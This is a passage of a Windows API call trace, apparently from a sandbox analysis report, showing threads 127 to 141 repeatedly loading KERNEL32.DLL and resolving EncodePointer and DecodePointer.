(hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.637] SysReAllocStringLen (in: pbstr=0x1709f6e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1709f6e0*="KERNEL32.DLL") returned 1 [0148.637] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.639] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 127 os_tid = 0x760 [0148.623] SysReAllocStringLen (in: pbstr=0x1722f504*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1722f504*="KERNEL32.DLL") returned 1 [0148.623] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.624] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.626] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.627] SysReAllocStringLen (in: pbstr=0x1722f504*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1722f504*="KERNEL32.DLL") returned 1 [0148.627] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.629] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0148.630] SysReAllocStringLen (in: pbstr=0x1722f4e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1722f4e0*="KERNEL32.DLL") returned 1 [0148.630] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0148.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0148.632] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0148.635] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.760] SysReAllocStringLen (in: pbstr=0x1722f7b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1722f7b8*="KERNEL32.DLL") returned 1 [0149.760] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.760] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.764] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 128 os_tid = 0x120 [0149.841] SysReAllocStringLen (in: pbstr=0x1707fa3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1707fa3c*="KERNEL32.DLL") returned 1 [0149.841] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.842] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.845] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.846] SysReAllocStringLen (in: pbstr=0x1707fa3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1707fa3c*="KERNEL32.DLL") returned 1 [0149.846] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.846] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.849] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.849] SysReAllocStringLen (in: pbstr=0x1707fa18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1707fa18*="KERNEL32.DLL") returned 1 [0149.849] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0149.850] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0149.853] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0149.856] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0150.156] SysReAllocStringLen (in: pbstr=0x1707fcf0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1707fcf0*="KERNEL32.DLL") returned 1 [0150.156] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0150.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0150.159] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 129 os_tid = 0x68c [0150.652] SysReAllocStringLen (in: pbstr=0x16f7f36c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f7f36c*="KERNEL32.DLL") returned 1 [0150.652] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0150.653] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0150.656] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0150.656] SysReAllocStringLen (in: pbstr=0x16f7f36c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f7f36c*="KERNEL32.DLL") returned 1 [0150.656] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0150.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0150.660] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0150.660] SysReAllocStringLen (in: pbstr=0x16f7f348*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f7f348*="KERNEL32.DLL") returned 1 [0150.660] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0150.660] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0150.663] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0150.667] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.073] SysReAllocStringLen (in: pbstr=0x16f7f620*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f7f620*="KERNEL32.DLL") returned 1 [0151.073] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.076] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 130 os_tid = 0x75c [0151.330] SysReAllocStringLen (in: pbstr=0x16f1f704*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f704*="KERNEL32.DLL") returned 1 [0151.330] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.330] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.333] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.333] SysReAllocStringLen (in: pbstr=0x16f1f704*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f704*="KERNEL32.DLL") returned 1 [0151.333] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.335] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.336] SysReAllocStringLen (in: pbstr=0x16f1f6e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f6e0*="KERNEL32.DLL") returned 1 [0151.336] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.338] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.341] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0152.824] SysReAllocStringLen (in: pbstr=0x16f1f9b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f9b8*="KERNEL32.DLL") returned 1 [0152.824] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0152.825] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0152.827] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 131 os_tid = 0x38c [0151.512] SysReAllocStringLen (in: pbstr=0x171bf93c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x171bf93c*="KERNEL32.DLL") returned 1 [0151.512] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.515] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.516] SysReAllocStringLen (in: pbstr=0x171bf93c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x171bf93c*="KERNEL32.DLL") returned 1 [0151.516] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.516] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.518] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.518] SysReAllocStringLen (in: pbstr=0x171bf918*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x171bf918*="KERNEL32.DLL") returned 1 [0151.518] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.519] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.521] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.523] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0152.830] SysReAllocStringLen (in: pbstr=0x171bfbf0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x171bfbf0*="KERNEL32.DLL") returned 1 [0152.830] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0152.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0152.833] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 132 os_tid = 0x5dc [0151.525] SysReAllocStringLen (in: pbstr=0x1705f50c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1705f50c*="KERNEL32.DLL") returned 1 [0151.525] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.525] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.528] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.528] SysReAllocStringLen (in: pbstr=0x1705f50c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1705f50c*="KERNEL32.DLL") returned 1 [0151.528] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.530] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.531] SysReAllocStringLen (in: pbstr=0x1705f4e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1705f4e8*="KERNEL32.DLL") returned 1 [0151.531] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.533] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.535] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0152.835] SysReAllocStringLen (in: pbstr=0x1705f7c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1705f7c0*="KERNEL32.DLL") returned 1 [0152.835] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0152.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0152.839] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 134 os_tid = 0x150 [0155.219] SysReAllocStringLen (in: pbstr=0x16f1f364*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f364*="KERNEL32.DLL") returned 1 [0155.219] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.220] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.222] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0155.223] SysReAllocStringLen (in: pbstr=0x16f1f364*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f364*="KERNEL32.DLL") returned 1 [0155.223] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.224] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.227] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0155.227] SysReAllocStringLen (in: pbstr=0x16f1f340*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f340*="KERNEL32.DLL") returned 1 [0155.227] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.227] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.230] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0155.233] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0155.571] SysReAllocStringLen (in: pbstr=0x16f1f618*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f1f618*="KERNEL32.DLL") returned 1 [0155.571] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.575] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 135 os_tid = 0x540 [0155.248] SysReAllocStringLen (in: pbstr=0x1719f4a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f4a4*="KERNEL32.DLL") returned 1 [0155.248] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.249] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.252] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0155.252] SysReAllocStringLen (in: pbstr=0x1719f4a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f4a4*="KERNEL32.DLL") returned 1 [0155.252] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.253] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.256] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0155.256] SysReAllocStringLen (in: pbstr=0x1719f480*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f480*="KERNEL32.DLL") returned 1 [0155.256] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0155.257] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0155.260] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0155.263] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.237] SysReAllocStringLen (in: pbstr=0x1719f758*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1719f758*="KERNEL32.DLL") returned 1 [0156.237] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.240] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 136 os_tid = 0x5b4 [0156.143] SysReAllocStringLen (in: pbstr=0x1734f4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1734f4e4*="KERNEL32.DLL") returned 1 [0156.143] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.146] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.146] SysReAllocStringLen (in: pbstr=0x1734f4e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1734f4e4*="KERNEL32.DLL") returned 1 [0156.146] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.149] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.149] SysReAllocStringLen (in: pbstr=0x1734f4c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1734f4c0*="KERNEL32.DLL") returned 1 [0156.149] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.152] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0156.154] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.844] SysReAllocStringLen (in: pbstr=0x1734f798*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1734f798*="KERNEL32.DLL") returned 1 [0156.844] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.849] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 137 os_tid = 0x914 [0156.596] SysReAllocStringLen (in: pbstr=0x16f3f3d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f3d4*="KERNEL32.DLL") returned 1 [0156.596] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.597] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.600] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.600] SysReAllocStringLen (in: pbstr=0x16f3f3d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f3d4*="KERNEL32.DLL") returned 1 [0156.600] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.601] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.604] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.604] SysReAllocStringLen (in: pbstr=0x16f3f3b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f3b0*="KERNEL32.DLL") returned 1 [0156.604] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.607] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0156.610] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0157.002] SysReAllocStringLen (in: pbstr=0x16f3f688*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f688*="KERNEL32.DLL") returned 1 [0157.003] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0157.003] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0157.006] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 138 os_tid = 0x690 [0157.582] SysReAllocStringLen (in: pbstr=0x1703f4f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1703f4f4*="KERNEL32.DLL") returned 1 [0157.582] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0157.583] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0157.585] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0157.585] SysReAllocStringLen (in: pbstr=0x1703f4f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1703f4f4*="KERNEL32.DLL") returned 1 [0157.585] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0157.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0157.588] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0157.588] SysReAllocStringLen (in: pbstr=0x1703f4d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1703f4d0*="KERNEL32.DLL") returned 1 [0157.588] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0157.589] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0157.591] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0157.593] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0157.813] SysReAllocStringLen (in: pbstr=0x1703f7a8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x1703f7a8*="KERNEL32.DLL") returned 1 [0157.813] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0157.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0157.817] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 139 os_tid = 0x7d8 [0159.278] SysReAllocStringLen (in: pbstr=0x170bf9fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170bf9fc*="KERNEL32.DLL") returned 1 [0159.278] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.279] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.282] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.282] SysReAllocStringLen (in: pbstr=0x170bf9fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170bf9fc*="KERNEL32.DLL") returned 1 [0159.283] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.283] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.286] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.287] SysReAllocStringLen (in: pbstr=0x170bf9d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170bf9d8*="KERNEL32.DLL") returned 1 [0159.287] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.290] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0159.293] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.812] SysReAllocStringLen (in: pbstr=0x170bfcb0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x170bfcb0*="KERNEL32.DLL") returned 1 [0159.812] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.815] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 140 os_tid = 0xae8 [0159.532] SysReAllocStringLen (in: pbstr=0x16f3f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f35c*="KERNEL32.DLL") returned 1 [0159.532] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.536] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.536] SysReAllocStringLen (in: pbstr=0x16f3f35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f35c*="KERNEL32.DLL") returned 1 [0159.536] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.539] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.540] SysReAllocStringLen (in: pbstr=0x16f3f338*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f338*="KERNEL32.DLL") returned 1 [0159.540] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.543] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0159.546] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0160.016] SysReAllocStringLen (in: pbstr=0x16f3f610*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16f3f610*="KERNEL32.DLL") returned 1 [0160.016] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0160.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0160.019] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 141 os_tid = 0xaf4 [0159.393] SysReAllocStringLen (in: pbstr=0x172ff52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x172ff52c*="KERNEL32.DLL") returned 1 [0159.393] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.394] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.397] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.397] SysReAllocStringLen (in: pbstr=0x172ff52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x172ff52c*="KERNEL32.DLL") returned 1 [0159.397] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.401] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0159.401] SysReAllocStringLen (in: pbstr=0x172ff508*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x172ff508*="KERNEL32.DLL") returned 1 [0159.401] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0159.402] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0159.405] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0159.407] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0160.010] SysReAllocStringLen (in: pbstr=0x172ff7e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x172ff7e0*="KERNEL32.DLL") returned 1 [0160.010] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0160.010] 